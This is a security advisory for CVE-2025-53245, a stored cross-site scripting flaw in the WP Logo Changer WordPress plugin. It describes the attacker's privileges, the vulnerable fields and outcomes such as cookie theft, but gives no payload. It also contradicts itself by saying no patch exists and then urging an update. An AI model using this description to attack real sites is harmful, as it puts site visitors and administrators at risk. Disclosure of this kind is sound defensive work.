CVE-2025-53245

The WP Logo Changer plugin (am-login-logo) versions up to and including 1.2 suffer from a stored cross-site scripting (XSS) vulnerability due to improper neutralization of user-supplied input during web page generation [1]. This flaw enables an authenticated attacker with contributor-level privileges or higher to inject arbitrary JavaScript or HTML payloads that are stored on the server and executed in the browsers of visitors.

Exploitation requires user interaction, such as a privileged user clicking a malicious link or visiting a crafted page [1]. The attacker can inject scripts through the plugin's logo upload or settings fields, which are then rendered on pages without proper sanitization. This attack surface targets the WordPress admin area, where the plugin stores logo configurations.

A successful attack can lead to a range of malicious activities, including redirecting visitors to phishing sites, injecting advertisements, or stealing session cookies [1]. The injected script executes in the context of the victim's browser, potentially compromising administrators' sessions and allowing further privilege escalation.

As of the advisory, the vendor has not released a patch, but Patchstack has issued a virtual mitigation rule to block attacks until an official update is available [1]. Users are advised to update the plugin immediately or apply the mitigation rule. If unable to update, consulting a hosting provider or web developer is recommended.